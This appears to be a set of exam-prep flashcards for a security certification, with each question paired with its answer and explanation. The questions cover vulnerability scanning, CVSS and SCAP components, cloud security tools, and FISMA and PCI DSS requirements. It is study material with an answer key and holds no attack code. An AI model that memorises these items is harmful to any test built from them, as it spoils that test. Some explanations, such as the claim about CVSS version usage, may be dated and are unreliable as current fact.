Ch 4 - 6
D. Pacu Pacu is an AWS-specific exploitation framework. It is particularly well suited to identifying the permissions available to an account during a penetration test. ScoutSuite, Inspector, and Prowler are all assessment tools that would not directly provide the information that Gina seeks.
Gina gained access to a client's AWS account during a penetration test. She would like to determine what level of access she has to the account. Which one of the following tools would best meet her need? A. ScoutSuite B. Inspector C. Prowler D. Pacu
D. Cross-site scripting In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.
Monica discovers that an attacker posted a message in a web forum that she manages that is attacking users who visit the site. Which one of the following attack types is most likely to have occurred? A. SQL injection B. Malware injection C. LDAP injection D. Cross-site scripting
D. Read-only Credentialed scans only require read-only access to target servers. Renee should follow the principle of least privilege and limit the access available to the scanner.
Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanner? A. Domain administrator B. Local administrator C. Root D. Read-only
A. Continuous monitoring Continuous monitoring incorporates data from agent-based approaches to vulnerability detection and reports security-related configuration changes to the vulnerability management platform as soon as they occur, providing the ability to analyze those changes for potential vulnerabilities.
What approach to vulnerability scanning incorporates information from agents running on the target servers? A. Continuous monitoring B. Ongoing scanning C. On-demand scanning D. Alerting
D. 3.1 Version 3.1 of CVSS is currently available but is not as widely used as the more common CVSS version 2.0.
What is the most recent version of CVSS that is currently available? A. 1.0 B. 2.0 C. 2.5 D. 3.1
C. High Control enhancement number 4 requires that an organization determine what information about the system is discoverable by adversaries. This enhancement only applies to FISMA high systems.
What minimum level of impact must a system have under FISMA before the organization is required to determine what information about the system is discoverable by adversaries? A. Low B. Moderate C. High D. Severe
D. Hybrid cloud Hybrid cloud environments blend elements of public, private, and/or community cloud solutions. A hybrid cloud requires the use of technology that unifies the different cloud offerings into a single, coherent platform.
Which cloud computing deployment model requires the use of a unifying technology platform to tie together components from different providers? A. Public cloud B. Private cloud C. Community cloud D. Hybrid cloud
C. PR The privileges required (PR) metric indicates the type of account access the attacker must have.
Which one of the CVSS metrics would contain information about the type of account access that an attacker must have to execute an attack? A. AV B. C C. PR D. AC
C. Reporting Although reporting and communication are an important part of vulnerability management, they are not included in the life cycle. The three life-cycle phases are detection, remediation, and testing.
Which one of the following activities is not part of the vulnerability management life cycle? A. Detection B. Remediation C. Reporting D. Testing
B. Snort Qualys, Nessus, and OpenVAS are all examples of vulnerability scanning tools. Snort is an intrusion detection system.
Which one of the following is not an example of a vulnerability scanning tool? A. Qualys B. Snort C. Nessus D. OpenVAS
C. Using a cloud provider's web interface to provision resources Infrastructure as code is any approach that automates the provisioning, management, and deprovisioning of cloud resources. Defining resources through JSON or YAML is IaC, as is writing code that interacts with an API. Provisioning resources through a web interface is manual, not automated, and therefore does not qualify as IaC.
Which one of the following is not an example of infrastructure as code? A. Defining infrastructure in JSON B. Writing code to interact with a cloud provider's API C. Using a cloud provider's web interface to provision resources D. Defining infrastructure in YAML
B. DeepLens AWS Lambda, Google Cloud Functions, and Microsoft Azure Functions are all examples of function as a service (FaaS) computing. AWS DeepLens is an AI-enabled camera.
Which one of the following services is not an example of FaaS computing? A. Lambda B. DeepLens C. Google Cloud Functions D. Azure Functions
C. Inline CASB solutions can monitor activity but cannot actively enforce policy. Inline CASB solutions require either network reconfiguration or the use of a software agent. They intercept requests from users to cloud providers and, by doing so, are able to both monitor activity and enforce policy.
Which one of the following statements about inline CASB is incorrect? A. Inline CASB solutions often use software agents on endpoints. B. Inline CASB solutions intercept requests from users to cloud providers. C. Inline CASB solutions can monitor activity but cannot actively enforce policy. D. Inline CASB solutions may require network reconfiguration.
B. IDS Intrusion detection systems (IDSs) are a security control used to detect network or host attacks. The Internet of Things (IoT), supervisory control and data acquisition (SCADA) systems, and industrial control systems (ICSs) are all associated with connecting physical world objects to a network.
Which one of the following terms is not typically used to describe the connection of physical devices to a network? A. IoT B. IDS C. ICS D. SCADA
C. Low An attack complexity of "low" indicates that exploiting the vulnerability does not require any specialized conditions.
Which one of the following values for the CVSS attack complexity metric would indicate that the specified attack is simplest to exploit? A. High B. Medium C. Low D. Severe
B. ScoutSuite ScoutSuite is the only cloud assessment tool listed here that performs security scans of Azure environments. Inspector and Prowler are AWS-specific tools. Pacu is an exploitation framework used in penetration testing.
Amanda would like to run a security configuration scan of her Microsoft Azure cloud environment. Which one of the following tools would be most appropriate for her needs? A. Inspector B. ScoutSuite C. Prowler D. Pacu
B. Moderate impact Systems have a moderate impact from a confidentiality perspective if the unauthorized disclosure of information could be expected to have a serious adverse effect on organizational operations, organizational assets, or individuals.
Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized? A. Low impact B. Moderate impact C. High impact D. Severe impact
A. VM escape VM escape vulnerabilities are the most serious issue that can exist in a virtualized environment, particularly when a virtual host runs systems of differing security levels. In an escape attack, the attacker has access to a single virtual host and then manages to leverage that access to intrude on the resources assigned to a different virtual machine.
In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine? A. VM escape B. Management interface brute force C. LDAP injection D. DNS amplification
C. CPE Common Platform Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.
Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance? A. CVSS B. CVE C. CPE D. OVAL
A. CVSS The Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of security vulnerabilities. Jessica could use this scoring system to prioritize issues raised by different source systems.
Jessica is reading reports from vulnerability scans run by different parts of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task? A. CVSS B. CVE C. CPE D. XCCDF
B. NAT Although the network can support any of these protocols, internal IP disclosure vulnerabilities occur when a network uses Network Address Translation (NAT) to map public and private IP addresses but a server inadvertently discloses its private IP address to remote systems.
Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What technology is likely in use on this network that resulted in this vulnerability? A. TLS B. NAT C. SSH D. VPN
D. Quarterly PCI DSS requires that organizations conduct vulnerability scans on at least a quarterly basis, although many organizations choose to conduct scans on a much more frequent basis.
Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans? A. Daily B. Weekly C. Monthly D. Quarterly
D. Data In the shared responsibility model, the customer always retains either full or partial responsibility for data security. Responsibility for hardware and physical datacenters is the cloud provider's responsibility under all models. Responsibility for applications is the customer's responsibility under IaaS, the provider's responsibility under SaaS, and a shared responsibility under PaaS.
Under the shared responsibility model, which component always remains the responsibility of the customer, regardless of the cloud service model used? A. Application B. Hardware C. Datacenter D. Data
C. Government agency The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors' offices, does not include a vulnerability scanning requirement, nor does GLBA, which covers financial institutions. Banks may be required to conduct scans under PCI DSS, but this is a contractual obligation and not a statutory requirement.
Which type of organization is the most likely to face a statutory requirement to conduct vulnerability scans? A. Bank B. Hospital C. Government agency D. Doctor's office